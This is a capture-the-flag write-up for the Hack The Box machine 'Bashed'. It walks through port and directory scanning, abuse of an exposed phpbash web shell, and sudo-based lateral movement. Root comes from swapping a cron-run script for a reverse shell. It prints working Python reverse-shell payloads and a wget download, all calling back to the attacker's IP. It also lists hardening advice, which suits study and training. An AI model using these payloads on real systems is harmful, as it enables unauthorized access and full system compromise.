htb-writeups

Bashed - Hack The Box Writeup

Overview

Bashed is an easy-rated Linux machine from Hack The Box that focuses on web application vulnerabilities and privilege escalation through cron jobs. This writeup documents the complete penetration testing process from initial reconnaissance to root access.

Reconnaissance

Target Information

export target=10.129.15.19

image

Network Scanning

Initial TCP Port Scan

sudo nmap -p- --min-rate 5000 -sT -vvv $target

image

Results:

Service Version Detection

sudo nmap -sC -sV -p 80 -T4 $target

image

Detailed Results:

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

Web Enumeration

Website Analysis

Visiting http://10.129.15.19 reveals a development website with limited functionality.

image

Directory Brute Forcing

gobuster dir -u http://10.129.15.19 \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,txt,html -t 50 2>/dev/null

image

Discovered Directories:

Key Discovery

Visiting http://10.129.15.19/dev/ reveals two files:

image

Initial Access

Web Shell Exploitation

Accessing http://10.129.15.19/dev/phpbash.php provides direct command execution capability.

image

Reverse Shell Establishment

# On attacker machine
nc -nlvp 4444

# Through phpbash.php
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.172",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'

image

Shell Stabilization

python -c 'import pty;pty.spawn("/bin/bash")'
# Press Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm

image

image

Privilege Escalation

User Enumeration

sudo -l

image

Output:

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

Lateral Movement to Scriptmanager

sudo -u scriptmanager bash

image

File System Discovery

cd /scripts
ls -la

Contents:

total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Jun  2  2022 .
drwxr-xr-x 23 root          root          4096 Jun  2  2022 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Nov  8 04:25 test.txt

Script Analysis

test.py:

f = open("test.txt", "w")
f.write("testing 123!")
f.close

Process Monitoring with pspy

image

# Transfer pspy to target
wget http://10.10.14.172/pspy32 -O /tmp/pspy32
chmod +x /tmp/pspy32
./pspy32

image

Critical Finding:

2025/11/08 04:34:01 CMD: UID=0 PID=1342 | python test.py

The test.py script is executed as root via a cron job.

Root Access

Reverse Shell Payload

Replace test.py with a reverse shell payload:

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.172",9004))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Root Shell Capture

# On attacker machine
nc -nlvp 9004

Wait for the cron job to execute (less than 1 minute).

Proof of Compromise

# Root shell commands
id
whoami
hostname
cat /home/arrexel/user.txt
cat /root/root.txt

image

Flags:

Attack Summary

  1. Reconnaissance: Discovered HTTP service on port 80
  2. Web Enumeration: Found /dev/phpbash.php web shell
  3. Initial Access: Established reverse shell through web shell
  4. Privilege Escalation:
    • Abused sudo permissions to become scriptmanager
    • Discovered root-executed cron job
    • Replaced Python script with reverse shell payload
  5. Root Access: Gained root shell via cron job execution

Security Recommendations

  1. Remove Development Files: Delete phpbash.php and other development tools from production environments
  2. Principle of Least Privilege: Review and restrict sudo permissions
  3. Cron Job Security: Ensure cron jobs don’t execute user-writable scripts as root
  4. Regular Audits: Conduct periodic security assessments of file permissions and cron jobs

Tools Used